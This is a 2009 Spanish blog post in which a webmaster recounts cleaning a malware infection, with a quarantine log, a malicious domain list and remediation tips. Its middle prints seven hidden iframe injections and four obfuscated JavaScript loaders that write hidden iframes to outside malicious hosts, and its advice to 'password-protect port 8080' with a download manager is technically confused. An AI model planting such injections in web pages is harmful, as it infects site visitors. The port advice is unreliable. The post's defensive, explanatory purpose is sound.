C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039100.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039101.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039102.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039104.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039105.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039106.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039107.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039108.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039109.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039110.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039111.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039112.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039113.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039114.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039115.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP235\A0039116.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039120.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039121.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039122.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039123.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039124.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039125.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039126.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039127.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039129.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039130.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039131.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039132.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039133.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039134.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039136.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039137.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039138.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039139.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039140.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039141.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039142.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039143.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039144.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039145.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039146.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039147.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039148.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039149.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039150.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039151.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039152.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039154.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039165.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039166.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039167.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039168.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039171.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039173.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039174.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039135.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039153.new (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039172.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP236\A0039229.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\System Volume Information\_restore{72135246-D116-4BE8-92FC-1AFE1F338C80}\RP251\A0039691.DRV (Trojan.Downloader) -> Quarantined and deleted successfully.
En general, es conveniente guardar una copia de restauración del sistema en CD, por si es necesario recuperar el computador a un estado anterior a la infección a causa de los daños ocurridos, o si bien, también puede ser de gran utilidad con el fin de restaurar aquellos archivos originales que han sido modificados y/o que utlizan el mismo nombre que los de origen, como por ejemplo ocurre con userinit.exe.
Ejemplos de Malware domain list.
Modo de infección de webs a través de la inyección de iframes maliciosos que contienen las direcciones electrónicas siguientes (no se deben abrir las urls) :
1. http://www.malwaredomainlist.com/mdl.php?
search=gianttopnano.cn:8080
Fecha : 2009/06/25_00:00
Dominio : gianttopnano.cn:8080/index.php
IP : 77.37.19.179
Malware : Exploits
Registrante : Raymond Best / raymond@cybernauttech.com
ASN : 44146
2. http://www.malwaredomainlist.com/mdl.php?
search=shopvideocommission.cn:8080
Fecha : 2009/06/25_00:00
Dominio : shopvideocommission.cn:8080/index.php
IP : 64.91.254.69
Reverse Lookup : host.transparent-tech.com
Malware : Exploits
Registrante : Scott Bell / ScottKBell@missiongossip.com
ASN : 32244
3. http://www.malwaredomainlist.com/mdl.php?
search=turbonamestore.cn:8080
Fecha : 2009/06/28_00:00
Dominio : turbonamestore.cn:8080/index.php
IP : 90.156.144.78
Reverse Lookup : v4350.vps.masterhost.ru
Malware : Exploits
Registrante : Scott Bell / ScottKBell@missiongossip.com
ASN : 25532
Ejemplos de 7 iframes maliciosos (no se deben abrir las urls).
<iframe src="http://q5m.ru:8080/index.php" width=106 height=182
style="visibility: hidden"></iframe>
<iframe src="http://mbdc.in:8080/index.php" width=199 height=155
style="visibility: hidden"></iframe>
<iframe src="http://b5r.at:8080/index.php" width=125 height=190
style="visibility: hidden"></iframe>
<iframe src="http://clydaib.net/?click=E7589" width=1 height=1
style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://39w.ru:8080/index.php" width=126 height=171
style="visibility: hidden"></iframe>
<iframe src="http://3e0.ru:8080/index.php" width=105 height=141
style="visibility: hidden"></iframe>
<iframe src="http://mymixwager.cn:8080/index.php" width=129 height=109
style="visibility: hidden"></iframe>
Ejemplos de 4 scripts maliciosos.
<!-- ad --><script>
document.write('<span id="nxs" style="display:none">
.3c.69.66.72.61.6d.65.20.73.72.63.3d.27.68.74
.74.70.3a.2f.2f.6e.65.77.6c.69.6e.65.62.69.7a.2e.72.75.2f.77.68.69
.74.65.70.61.67.65.2e.68.74.6d.6c.27.20.73.74.79.6c.65.3d.27.64.69
.73.70.6c.61.79.3a.6e.6f.6e.65.3b.27.3e.3c.2f.69.66.72.61.6d.65.3e
</span>');var nxs, jfM, TRw = unescape;nxs =
document.getElementById("nxs");nxs = nxs.innerHTML;jfM =
nxs.replace(/[\+.]/g, "%");jfM = TRw(jfM);document.write
(jfM);</script><!-- /ad -->
<!-- ad --><script>
document.write('<span id="xcS" style="display:none">
.3c.69.66.72.61.6d.65.20.73.72.63.3d.27.68.74
.74.70.3a.2f.2f.74.72.61.6d.61.64.6f.6c.73.70.61.63.65.2e.72.75.2f
.73.79.6d.70.6c.65.2e.68.74.6d.6c.27.20.73.74.79.6c.65.3d.27.64.69
.73.70.6c.61.79.3a.6e.6f.6e.65.3b.27.3e.3c.2f.69.66.72.61.6d.65.3e
</span>');var xcS, eKT, Ype = unescape;xcS =
document.getElementById("xcS");xcS = xcS.innerHTML;eKT =
xcS.replace(/[\+.]/g, "%");eKT = Ype(eKT);document.write
(eKT);</script><!-- /ad -->
<!-- ad --><text
area id=MKoTGWru style="display:none">
%3Ciframe width%3D1 height%3D1 border%3D0
frameborder%3D0 src%3D%27http%3A%
2F%2Flitenewupload.ru%2Fhplitle.html%27%3E%3C%2Fiframe%
3E</text
area><script>function ucDU(qUZSx){ fff.op.replace("v"); }
var NnCKX=document;document['wr1ite'.replace(/[0-9]/,'')](unescape
(document.getElementById('MKoTGWru').value));function NNNhPT(JZiP)
{ var NyT=new Function("PhuLROsrlX", "return 33845;"); fff=op.split("66"); }
</script><!-- /ad -->
<!-- ad --><text
area id=FEfVfbFxuC style="display:none">
%3Ciframe width%3D1 height%3D1 border%3D0
frameborder%3D0 src%3D%27http%3A%
2F%2Fgrationsamu.ru%2Fastro.html%27%3E%3C%2Fiframe%
3E</text
area><script>function Plr(huNld){ var gTC =
document.getElementById('WlkJeSjG'); }
var fRew=document;document['wr1ite'.replace(/[0-9]/,'')](unescape
(document.getElementById('FEfVfbFxuC').value));function ECWN
(TwrPf){ fff=op.split("66"); }
</script><!-- /ad -->
Notas y Textos.
(1) Programa para eliminar malware en su PC.
Los análisis, actualizaciones y recomendaciones indicadas hacen necesario y diría que indispensable que descarguen en su ordenador el programa Malwarebytes Anti-Malware y ejecuten tras su instalación la procedente actualización para tener la firma de intrusiones al día. De este modo, y actualizado procedan a analizar todas las unidades de su PC, y en 2-3 horas evaluados los cientos de miles de archivos, tanto visibles como ocultos, ... se emite un informe con aquellos archivos y aplicaciones que se encuentran infectados y que hayan podido pasar inadvertidos a otros programas anti-virus ... deberán llegados a este punto quitarlos, pasando a situación de cuarentena y siendo posteriormente automáticamente eliminados ...
La dirección electrónica del programa anti-malware, en la url : malwarebytes.org (download free version) ...
Se les recomienda encarecidamente, que instalen el programa para limpiar de posibles contagios su ordenador, ... y como medida suplementaria para asegurar su PC sumen este análisis periódicamente a los que estan acostumbrados a realizar habitualmente con sus programas anti-virus, nuestra recomendación para su seguridad en la red es el examen de Norton Security Check, la descarga de Norton Add-on-Pack y activar en la exploración web el bloqueo de los anuncios.
(2) Complemento de protección con contraseña del puerto 8080.
Se trata ahora de tomar otra medida suplementaria que se trata de proteger con contraseña el puerto 8080 de su ordenador, ... por la experiencia, hemos observado que los códigos maliciosos en formato de iframes contienen una dirección electrónica seguida de : 8080 ... lo cual indica que este es el puerto de conexión, Por tanto, esta es la siguiente medida para securizar su PC.
Normalmente, el puerto 80 es el que se conecta con la red de Internet con la configuración http:// ... y se utiliza el puerto 8080 como ruta alternativa al puerto 80, ... es por esta razón que creemos necesario por el hecho de que el puerto que utiliza este código malicioso es el puerto 8080, ... que deberían protegerlo con contraseña ...
Les informamos el procedimiento a utilizar para proteger con clave de acceso el puerto 8080 del PC ...
En primer lugar, descargar el programa free download manager que pueden descargar desde el sitio espejo de Source Forge o directamente desde la página de sus creadores freedownloadmanager.org
Una vez hecho esto, y siguiendo las instrucciones de instalación, ... se descarga en su PC varios elementos entre los cuales se encuentra el que nos importa para proteger con contraseña el puerto 8080 ... entre sus accesorios instalados se encuentra FDM remote control server que deben ejecutar, se les abrirá una ventana de diálogo en la que aparece por defecto su dirección IP en la casilla current address is ... con lo cual no es necesario introducir el número ... pero en cambio en la casilla use port deben introducir 8080. Asimismo, marcar la casilla protect access to server e introducir en la casilla user y password la contraseña que deseen ... el primer y último paso es marcar la casilla load on startup y seguidamente OK ... se habrá configurado de este modo el acceso con clave en el puerto 8080 ...
El programa free download manager es un sistema avanzado de petición de descargas seguras de modo que se puedan programar por defecto en el puerto 80 o también 8080 y acto seguido protegerse con clave de acceso, es decir, la página electrónica en su PC desde donde pueden realizar descargas de archivos de diferentes sitios en la red se hallará configurada en el puerto 8080 y este a la vez protegido con contraseña para evitar intrusiones ...
(3) Navegador actualizado en la última versión.
Cabe decir que sería conveniente que actualizaran su navegador de la versión Internet Explorer 6 y 7 a la actual IE8, ... pues es más seguro, y normalmente el malware se instala con un archivo denominado iExplorer.exe en su computadora ... si encuentran un archivo de estas características en su PC, procedan a analizarlo con Malwarebytes anti-malware para su posterior eliminación si resulta ser el archivo oculto o camuflado que se ha instalado como código malicioso en su ordenador, ... que existe esta probabilidad, no lo borren al detectarlo si no están seguros de estar contaminado para no afectar el funcionamiento de su navegador en caso de ser un archivo del sistema, ... esta observación se la hago porque es uno de los procedimientos utilizados por este tipo de malware para permanecer inadvertido para algunos programas anti-virus que no lo detectan .,. en cambio malwarebytes anti-malware si que lo encuentra en caso de estar infectado ...
La incidencia gracias a Malwarebytes Anti-Malware que también pueden descargar en el sitio espejo de CNET (...) ha sido posible solventarla, iExplorer.exe que es el sofware espía que les hemos informado para evitar que se instale en sus PCs se trata de un troyano que intenta robar los datos de los clientes de la banca on line. .....que actúa como puerta trasera (en este caso por el puerto 8080), permitiendo a un atacante remoto acceder y controlar el equipo infectado.
Posee un componente que le permite ocultar su presencia en el sistema. ... por esta razón algunos programas anti-virus no lo detectan y en cambio Malwarebytes Anti-Malware si lo encuentra y destruye ... está programado para robar información relacionada con cuentas bancarias... Es también necesario actualizar su navegador descargando IE8 en la dirección electrónica de microsoft.com (...)
En definitiva, cierren la puerta trasera de acceso del puerto 8080 mediante contraseña usando FDM Remote Control Server del programa Free Download Manager (...) con el fin de evitar que cualquier troyano de bancos en esta forma u otra se instale en su PC por este u otros medios a través de la red, porque esta incidencia no es un caso aislado, ... se pueden encontrar con este problema a través de la navegación a numerosas páginas web en Internet ...
Las medidas de protección para los usuarios son efectivas tras instalar Malwarebytes Anti-Malware en el PC, analizar y destruir (malware trace y trojan agent), aplicar FDM Remote Control Server de Free Download Manager para proteger el puerto 8080 con contraseña, y actualizar al navegador Internet Explorer 8.
(4) Sobre la directiva de privacidad de páginas web.
Si quieren Uds. hacer sus comprobaciones, con la directiva de privacidad en el navegador Internet Explorer 8, encontrarán un modo efectivo de saber si durante su visita a cualquiera de sus webs han sufrido un ataque por malware, siguiendo las siguientes instrucciones ...
En la pestaña Seguridad de la barra de herramientas de su navegador, encontrarán en el menú, el acceso a la directiva de privacidad de páginas web, la marcan y se desplegará una ventana de diálogo en la que constan todas las direcciones electrónicas que han operado en su PC durante su visita a cualquiera de sus sitios en Internet.
De este modo, si entre la lista de urls aparecen las que tienen autorizadas como webmasters, todo es correcto, pero si existe alguna que no tiene que ver con las descritas es que se ha producido una intrusión a través del host de su servidor de alojamiento y se ha inyectado código malicioso en el dominio …
Deben comprobar la lista de urls dentro de la directiva de privacidad (con aceptación o bloqueo automático de cookies) que son las autorizadas y normales de encontrar … con el fin de descartar posibles inserciones de código malicioso en su sitio y sin su conocimiento.
(5) Lenguaje de programación para .htaccess.
- Evita el acceso a sitios spammers, hackers y demás.
- Elude el acceso remoto a algunos proxys y otros sitios inseguros.
- Bloquea IPs de servidores y personas que se dedican a hacer spam o también varios proxys anónimos que a menudo sufren estos abusos.
- Interrumpe la acción de navegadores maliciosos que nos intentan robar direcciones de e-mail, diseño del sitio web, descargar ficheros hasta que el servidor colapse, etc ...
(6) Resultado de las medidas adoptadas.
La implantación de un rastreador anti-malware en su PC, es decir, del programa Malwarebytes Anti-Malware para análisis y reparación de código malicioso, ... junto a la intervención de Windows Live OneCare …
La protección con contraseña del puerto 8080, con la aplicación de FDM Remote Control Server de Free Download Manager … y la actualización a IE8 con la utilización simultánea de la directiva de privacidad de páginas web para presentes y futuras comprobaciones …
El uso del programa XAMPP de simulación con Apache, Mysql, ftp, php, etc ... para ayudar a recuperar la página electrónica original y hacer efectiva su actualización (por ejemplo a XOOPS 2.0.) con el fin de mejorar su seguridad, ...
El cambio en la clave de acceso FTP y la modificación de los archivos .htaccess en los que se han introducido código específico y genérico contra la infección en nuestro servidor ...
Y la instrumentalización de las herramientas del webmaster de Google así como del programa de prevención de intrusiones Dasient WAM, ...
Hacen de todas estas medidas adoptadas a día de hoy una metodología efectiva para garantizar la seguridad en la web, como si nuestro sitio en la red se tratara de un banco nacional, …
La regla de oro de la seguridad en Internet es mantener actualizados tanto los anti-virus como las aplicaciones informáticas de nuestro PC.
Un ejemplo de programa que también nos servirá para complementar la protección de nuestros ordenadores es Microsoft Security Essentials.
Referencias bibliográficas.
1. Malwarebytes Anti-Malware.
Autor : malwarebytes.org.
Detecta y elimina el malware de tu PC.
Por : Luís Ponce de León.
Malwarebytes Anti-Malware escanea los discos y dispositivos de tu ordenador en busca de todo tipo de malware, y lo elimina.
Malwarebytes Anti-Malware ofrece dos tipos de análisis. El rápido y el completo, para un análisis en profundidad.
Esta aplicación actualiza automáticamente la lista de malware y puede programarse para analizar el PC a una hora determinada. Cuenta además con una lista para los ficheros en cuarentena y otra para los que se deben ignorar.
Malwarebytes Anti-Malware incluye (…) una herramienta que garantiza la eliminación de cualquier archivo infectado.
Este programa (…) a posteriori de la infección proporciona la posibilidad de activar la versión protección en tiempo real, que es de pago.
2. Windows Live OneCare.
Autor : onecare.live.com.
Antivirus, antispyware, cortafuegos y copias de seguridad.
Por : Julián Gómez.
Windows Live OneCare es la solución de seguridad de Microsoft que integra antivirus, antispyware, cortafuegos y otras herramientas de seguridad.
(…) La protección antivirus y antispyware, ofrece tanto protección en tiempo real como análisis bajo demanda. En este último caso, en los análisis, cuenta con tres diferentes: rápido, personalizado y completo.
El cortafuegos detecta aplicaciones que conoce (…). De esta forma (…) el cortafuegos de Windows Live OneCare detecta Firefox y le abre paso sin que necesite (…) autorización (…)
También resulta destacable su sistema de copias de seguridad. Muy claro, fácil de configurar y con posibilidad de copia incremental, es decir, copiar sólo los archivos que se hayan modificado.
En cuanto a mantenimiento, Windows Live OneCare también se cuida de eliminar archivos temporales y realizar desfragmentaciones de disco (…).
3. Free Download Manager - FDM Remote Control Server.
Autor : freedownloadmanager.org.
Descarga ficheros con mayor velocidad y comodidad.
Por : Julián Gómez.
Este gestor de descargas te permite administrar los ficheros que bajas de Internet al tiempo que multiplicas tu velocidad de descarga, exprimiendo al máximo el ancho de banda de tu conexión aunque descargues desde servidores no especialmente rápidos.
Free Download Manager soporta conexiones con protocolos HTTP, HTTPs, FTP (con o sin autentificación), Metalink y Bittorrent, se integra con Internet Explorer y con tu programa antivirus (para analizar automáticamente el fichero …), te permite delimitar la prioridad de cada descarga y, por supuesto, reanudar descargas que hayan sido interrumpidas (…).
Podrás además automatizar el proceso, programando la conexión a Internet a una hora concreta, la descarga de determinados ficheros, la ejecución de un programa cualquiera y la desconexión o apagado del PC una vez hayas acabado.
Un gestor de descargas excelente.
4. Internet Explorer 8.
Autor : microsoft.com.
La última versión de un clásico de los navegadores.
Por : Iván Ramírez.
Cuando muchos aún no han tenido el valor suficiente para adoptar Internet Explorer 7, llega la última versión del navegador de Internet más utilizado a nivel mundial.
En cuanto a opciones añadidas, en Internet Explorer 8 destacan varias funcionalidades. Por ejemplo los WebSlices (…).
Otra novedad de Internet Explorer 8 son los Aceleradores. Son la forma en la que Microsoft se aproxima a los servicios web (…) últimamente, y permiten añadir al menú contextual enlaces relevantes para añadir páginas a tu blog, subir fotos a algún servicio de hospedaje o, en definitiva, añadir cualquier modo de interacción entre páginas.
Internet Explorer 8 dispone de InPrivate, una función con la cual podrás navegar sin dejar huellas. El botón de Sitios sugeridos puede recomendarte páginas similares a la que estás visitando, y SmartScreen te defenderá de páginas maliciosas (…) el Administrador de extensiones, una novedad de Internet Explorer 8 (…) facilita mucho la gestión de los nuevos complementos.
Más sólido que nunca y con accesorios muy útiles, Internet Explorer 8 es la respuesta de Microsoft (…)
5. Xampp : Apache, FTP, MySQL ...
Autor : apachefriends.org.
Monta tu página web en local con este pack de fácil instalación.
Por : Damien Rasson.
Una de las formas más fáciles y rápidas de tener Apache, MySQL, PHP y phpMyAdmin en su máquina es, sin lugar a dudas, pasando por un paquete de instalación cómodo y automático como XAMPP. Ofrece un pack de instalación automática con lo que podrás alojar y servir tus páginas web desde tu máquina en local.
Además, XAMPP ofrece una colección de librerías y otras aplicaciones de gran utilidad para el manejo y administración de una página web, junto a todas las dependencias que resultan imprescindibles para ello (…) así como un completo panel de control especialmente diseñado por XAMPP.
Un servidor web, una base de datos MySQL, PHP, un servidor de correo electrónico, Perl y un servidor FTP son los elementos claves de esta distribución. Además incluye Apache 2 y las últimas versiones de MySQL y PHP; Apache y MySQL se instalarán como servicios. Y todo esto gracias a un asistente que automatizará todo el proceso para que sea lo más leve y rápido posible.
6. Xoops 2.0. : CMS.
Autor : xoops.org.
Potente, flexible y completo sistema de gestión de contenidos.
Por : Elena Santos.
Xoops es lo que se denomina un sistema de administración de contenidos web, mediante el cual el administrador de un sitio web puede fácilmente crear páginas web dinámicas, con gran control de gestión de contenidos, y (…) otras interesantes funcionalidades.
Resulta perfecta para crear comunidades web de múltiples usuarios, páginas web corporativas, weblogs personales y mucho más.
El sistema incorpora diferentes módulos, destinados a distintos tipos de contenidos, y que puedes utilizar o no en función del diseño y características de tu web: noticias, foro, descargas, enlaces web, etc …
Xoops utiliza una base de datos relacional (MySQL), permite a sus usuarios registrados un altísimo nivel de personalización de perfil, soporta múltiples idiomas, permite el uso de temas de diseño (…) y es totalmente gratuito, gracias al trabajo de toda una comunidad que lo desarrolla y mejora día a día bajo la licencia GNU.
7. Google Search.
Autor : google.com.
Google Webmaster Help ...
Por : Juan Manuel González.
El servicio de ayuda del Centro para Webmasters de Google está disponible en 12 idiomas incluyendo francés, italiano, alemán, español, portugués y ruso (…) para Webmasters está pensado como un lugar de encuentro para que los usuarios se ayuden entre ellos, hagan preguntas y compartan información sobre cómo Google rastrea e indexa los sitios web. En ocasiones participará (…) el equipo de Google.
8. Dasient WAM - Web Anti-Malware.
Autor : dasient.com
Ex trabajadores de Google crean un servicio que reduce el malware de las webs.
Por : Arancha Asenjo y Marta Cabanillas.
La start-up Dasient se estrena con un servicio basado en cloud diseñado para detectar código malicioso en páginas de Internet y evitar su entrada en las listas negras.
Dos antiguos empleados de Google - Neil Daswani, anterior director de productos de seguridad, y el ingeniero de software Sharif Rizvi- y Ameet Ranadive, cuyo perfil incluye diversos puestos en el área de consultora de McKinsey & Co. y HP, han formado una nueva empresa volcada en la seguridad de los sitios web.
La compañía, de nombre Dasient, mantiene un estrecho contacto con Google y ha recibido dos millones de dólares de financiación de entidades como Maples Investment, Radar Partners, Stratton Sclavos y Eric Benhamou. Su estreno en el mercado lo hace con un servicio web antimalware que utiliza los web crawlers y la heurítica para detectar automáticamente código malicioso cargado por los ciberdelincuentes en páginas web legítimas con el objetivo de descargar malware o llevar a los visitantes a páginas fraudulentas. Como consecuencia, los sitios infectados con malware a menudo terminan en las listas negras de páginas supuestamente peligrosas recopiladas por Google, así como por las empresas de seguridad.
Daswani asegura que es “un desafiante problema de ingeniería” el realizar diagnósticos de sites infectados por malware y poner en cuarentena el código sin interrumpir el uso de la página. El servicio Dasient Web Anti-Malware, cuyo coste parte de los 50 dólares al mes, aún está en fase “alfa” en algunos aspectos, especialmente la capacidad para poner en cuarentena el malware, tal y como han reconocido los cofundadores de Dasient. Esta funcionalidad requiere un módulo de software Dasient instalado en un servidor web para su protección.
En definitiva, el objetivo es asistir a los webmasters a la hora de encontrar dónde están los problemas de malware antes de que las páginas sean puestas en las listas negras, así como ayudarles a salir de dichas listas, lo que provoca una disrupción del negocio y la marcha de los clientes. El servicio Dasient también puede ser utilizado por proveedores de alojamiento web para ayudar a sus clientes con este problema.
Agradecimientos.
La elaboración del presente artículo es el resultado del trabajo realizado en estrategia.info del 25 de junio al 3 de septiembre de 2009, y ha sido posible gracias a la colaboración de Antonio Amenós Vidal - e-mail : soporte@estrategia.info, webmaster de Networkers Community ...
Palabras Clave.
Anti-Malware, Webmaster, Networkers Community.
añadir comentario
| enlace permanente
| 



( 3.1 / 272 )




( 3.1 / 272 )
domingo, agosto 30, 2009, 09:27 PM - FPC - Fundación Psicología y Cristianismo
Boletines, núm. 76 - 80 (10 julio - 31 agosto 2008).
núm. 80 : 20-31 agosto 2009
-
30 agosto 2009, 14:50
RIES - Podcast n. 21 : 29-8-09.
30 agosto 2009, 14:14
RIES n. 147 : 25-8-09.
30 agosto 2009, 14:10
RIES n. 146 : 19-8-09.
29 agosto 2009, 16:54
C-FAM : 28-8-09
29 agosto 2009, 16:53
C-FAM : 21-8-09
27 agosto 2009, 16:28
CTV n. 239 : Papa: La Tierra es un don precioso del Creador.
27 agosto 2009, 16:25
CTV n. 238 : Benedicto XVI: todavía hoy la fe cristiana escandaliza.
27 agosto 2009, 16:23
CTV n. 237 : Papa: para evangelizar sirven sacerdotes bien formados.
-
19 agosto 2009, 18:05
CTV n. 236 : La Eucaristía, pan vivo bajado del cielo .
19 agosto 2009, 18:02
CTV n. 235 : Los mártires son testigos de Dios.
18 agosto 2009, 17:35
RIES n. 145 : 12-8-09.
18 agosto 2009, 17:31
RIES n. 144 : 6-8-09.
18 agosto 2009, 17:27
RIES n. 143 : 28-7-09.
17 agosto 2009, 18:18
C-FAM : 14-8-09
17 agosto 2009, 18:14
C-FAM : 7-8-09
17 agosto 2009, 18:10
C-FAM : 31-7-09
-
10 agosto 2009, 19:41
RIES - Podcast n. 20 : 1-8-09.
10 agosto 2009, 19:35
Rome Reports n. 166-176 : 29-7-09.
10 agosto 2009, 19:30
